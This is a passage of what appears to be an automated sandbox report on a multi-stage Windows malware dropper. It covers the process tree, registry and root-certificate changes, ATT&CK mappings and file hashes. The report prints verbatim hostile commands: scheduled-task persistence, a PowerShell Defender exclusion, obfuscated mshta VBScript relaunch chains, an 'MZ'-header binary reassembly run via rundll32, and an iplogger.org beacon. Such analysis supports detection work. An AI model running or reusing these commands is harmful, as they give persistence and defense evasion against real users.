040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	install.exe
Key created	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	Firstoffer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	Firstoffer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	DownFlSetup110.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

692 schtasks.exe
2708 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

Chrome 5.exerundll32.exepowershell.exeservices64.exe

pid process

1880 Chrome 5.exe
1708 rundll32.exe
2140 powershell.exe
1652 services64.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

setup_2.tmp

pid process

2200 setup_2.tmp

pid	process
692	schtasks.exe
2708	schtasks.exe

pid	process
2200	setup_2.tmp

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

DownFlSetup110.exe7.exe11.exetaskkill.exeChrome 5.exepowershell.exeservices64.exe

description	pid	process
Token: SeDebugPrivilege	1652	DownFlSetup110.exe
Token: SeDebugPrivilege	1148	7.exe
Token: SeDebugPrivilege	1068	11.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	1880	Chrome 5.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	1652	services64.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

2736 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

2736 iexplore.exe
2736 iexplore.exe
2852 IEXPLORE.EXE
2852 IEXPLORE.EXE
2852 IEXPLORE.EXE
2852 IEXPLORE.EXE

pid	process
2736	iexplore.exe

pid	process
2736	iexplore.exe
2736	iexplore.exe
2852	IEXPLORE.EXE
2852	IEXPLORE.EXE
2852	IEXPLORE.EXE
2852	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exeInstall.EXEsfx_123_206.exesetup_2.exe

description	pid	process	target process
PID 1948 wrote to memory of 1880	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Chrome 5.exe
PID 1948 wrote to memory of 1880	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Chrome 5.exe
PID 1948 wrote to memory of 1880	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Chrome 5.exe
PID 1948 wrote to memory of 1880	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Chrome 5.exe
PID 1948 wrote to memory of 1640	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	inst001.exe
PID 1948 wrote to memory of 1640	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	inst001.exe
PID 1948 wrote to memory of 1640	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	inst001.exe
PID 1948 wrote to memory of 1640	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	inst001.exe
PID 1948 wrote to memory of 1652	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	DownFlSetup110.exe
PID 1948 wrote to memory of 1652	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	DownFlSetup110.exe
PID 1948 wrote to memory of 1652	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	DownFlSetup110.exe
PID 1948 wrote to memory of 1652	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	DownFlSetup110.exe
PID 1948 wrote to memory of 2272	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Firstoffer.exe
PID 1948 wrote to memory of 2272	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Firstoffer.exe
PID 1948 wrote to memory of 2272	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Firstoffer.exe
PID 1948 wrote to memory of 2272	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Firstoffer.exe
PID 1948 wrote to memory of 2996	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1948 wrote to memory of 2996	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1948 wrote to memory of 2996	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1948 wrote to memory of 2996	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1948 wrote to memory of 2996	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1948 wrote to memory of 2996	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1948 wrote to memory of 2996	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup.exe
PID 1948 wrote to memory of 2080	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Install.EXE
PID 1948 wrote to memory of 2080	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Install.EXE
PID 1948 wrote to memory of 2080	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Install.EXE
PID 1948 wrote to memory of 2080	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	Install.EXE
PID 2080 wrote to memory of 2860	2080	Install.EXE	install.exe
PID 2080 wrote to memory of 2860	2080	Install.EXE	install.exe
PID 2080 wrote to memory of 2860	2080	Install.EXE	install.exe
PID 2080 wrote to memory of 2860	2080	Install.EXE	install.exe
PID 2080 wrote to memory of 2860	2080	Install.EXE	install.exe
PID 2080 wrote to memory of 2860	2080	Install.EXE	install.exe
PID 2080 wrote to memory of 2860	2080	Install.EXE	install.exe
PID 1948 wrote to memory of 2648	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1948 wrote to memory of 2648	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1948 wrote to memory of 2648	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1948 wrote to memory of 2648	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1948 wrote to memory of 2648	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1948 wrote to memory of 2648	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1948 wrote to memory of 2648	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	sfx_123_206.exe
PID 1948 wrote to memory of 1148	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	7.exe
PID 1948 wrote to memory of 1148	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	7.exe
PID 1948 wrote to memory of 1148	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	7.exe
PID 1948 wrote to memory of 1148	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	7.exe
PID 1948 wrote to memory of 2924	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 1948 wrote to memory of 2924	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 1948 wrote to memory of 2924	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 1948 wrote to memory of 2924	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 1948 wrote to memory of 2924	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 1948 wrote to memory of 2924	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 1948 wrote to memory of 2924	1948	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	setup_2.exe
PID 2648 wrote to memory of 2788	2648	sfx_123_206.exe	mshta.exe
PID 2648 wrote to memory of 2788	2648	sfx_123_206.exe	mshta.exe
PID 2648 wrote to memory of 2788	2648	sfx_123_206.exe	mshta.exe
PID 2648 wrote to memory of 2788	2648	sfx_123_206.exe	mshta.exe
PID 2648 wrote to memory of 2788	2648	sfx_123_206.exe	mshta.exe
PID 2648 wrote to memory of 2788	2648	sfx_123_206.exe	mshta.exe
PID 2648 wrote to memory of 2788	2648	sfx_123_206.exe	mshta.exe
PID 2924 wrote to memory of 2920	2924	setup_2.exe	setup_2.tmp
PID 2924 wrote to memory of 2920	2924	setup_2.exe	setup_2.tmp
PID 2924 wrote to memory of 2920	2924	setup_2.exe	setup_2.tmp
PID 2924 wrote to memory of 2920	2924	setup_2.exe	setup_2.tmp
PID 2924 wrote to memory of 2920	2924	setup_2.exe	setup_2.tmp

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
3⤵
PID:2524

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
4⤵
- Scheduled Task/Job: Scheduled Task
PID:692

C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
4⤵
PID:1892

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
5⤵
- Scheduled Task/Job: Scheduled Task
PID:2708

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:588

C:\Users\Admin\AppData\Local\Temp\inst001.exe
"C:\Users\Admin\AppData\Local\Temp\inst001.exe"
2⤵
- Executes dropped EXE
PID:1640

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 872
3⤵
- Loads dropped DLL
- Program crash
PID:2740

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2996

C:\Users\Admin\AppData\Local\Temp\Install.EXE
"C:\Users\Admin\AppData\Local\Temp\Install.EXE"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2080

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:2860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe"
4⤵
- Executes dropped EXE
PID:328

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\INSTAL~1.EXE
3⤵
- Executes dropped EXE
PID:1312

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSCA80.tmp\Install.cmd" "
4⤵
PID:1932

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1NEph7
5⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2736

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2736 CREDAT:275457 /prefetch:2
6⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2852

C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
3⤵
PID:2788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
4⤵
- Loads dropped DLL
PID:2632

C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
5⤵
- Executes dropped EXE
PID:1960

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
6⤵
- Modifies Internet Explorer settings
PID:2252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
7⤵
PID:548

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
6⤵
- Modifies Internet Explorer settings
PID:2524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
7⤵
PID:2828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
8⤵
PID:1876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
8⤵
PID:1944

C:\Windows\SysWOW64\control.exe
control ..\kZ_AmsXL.6G
8⤵
PID:2588

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
9⤵
- Loads dropped DLL
PID:2616

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
10⤵
PID:2580

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
11⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1708

C:\Users\Admin\AppData\Local\Temp\f7861bf.exe
"C:\Users\Admin\AppData\Local\Temp\f7861bf.exe"
12⤵
- Executes dropped EXE
PID:2068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 596
13⤵
- Loads dropped DLL
- Program crash
PID:2588

C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "sfx_123_206.exe"
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Users\Admin\AppData\Local\Temp\7.exe
"C:\Users\Admin\AppData\Local\Temp\7.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1148

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2924

C:\Users\Admin\AppData\Local\Temp\is-JUDE4.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JUDE4.tmp\setup_2.tmp" /SL5="$501C2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2920

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1384

C:\Users\Admin\AppData\Local\Temp\is-U1LON.tmp\setup_2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U1LON.tmp\setup_2.tmp" /SL5="$301EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:2200

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
2⤵
- Executes dropped EXE
PID:1316

C:\Users\Admin\AppData\Local\Temp\liuyan-game.exe
"C:\Users\Admin\AppData\Local\Temp\liuyan-game.exe"
2⤵
- Executes dropped EXE
PID:1300

C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4f3c72049279c65ec947490f938be2ac

SHA1
a9702f8649e5da9b40487790a0a3867f5519aa42

SHA256
f9b4177ca419d6cf2b42c624ce9c7bbf44d53bbb102d2772ef64a5f790a55d37

SHA512
ef042e296be7474717372f5e063ca14d3051c1f64d2caae0114f7fb10278eff1b10c991132d8b587806aa9dc6b22941b3581443f9ea6e01f7c0234d6373acab1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
60bbaa0c308ea144fdaae45ce48afc43

SHA1
81e744fd7f917fe69d2228ab50f285f8b2405483

SHA256
b85a54a18e621bf2299c4cbf61ae7a857e6c625829d3bf104270039b7d6c053c

SHA512
e420341a1ca2939e202e1e6702f770f2430f26e7268d6e4a01dc1a1750a2c111045c017c9b80c4f872c12af055cb91401e8ff7e31371af5607acefb3de7a360a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
713b56944e0ba22deae19839d7f552dd

SHA1
2bc891ae8db939d8813b42c58458d9cb8cc69dd9

SHA256
db68f2f57be38a888784fd55ae9577c635966d4ba3c884e745633d43d636221c

SHA512
9c3f49c0264d71743f16a987dc6bb2a3aebc907b481e51a52d5cd551102d241500f0fa3c7b57480f129d60c0267ba8d4b310a67040c65cdca482db0e9e4704d2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ebcf67a56a221ea19f4045e03fece5b4

SHA1
ef17bf8c899242fe7726ab1e2c720e7aa6a0c9e6

SHA256
d44850a4429d546992c57032df5621f9630e0aa6c004247c8c18f2a259798f33

SHA512
808ca5905c9bf6528b69b4691be208d9160d54b1d1b6fc227c865446fde6a85157f4df7444012a939b0168228360951aab7d04614d8b55da8b366be262136ba0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
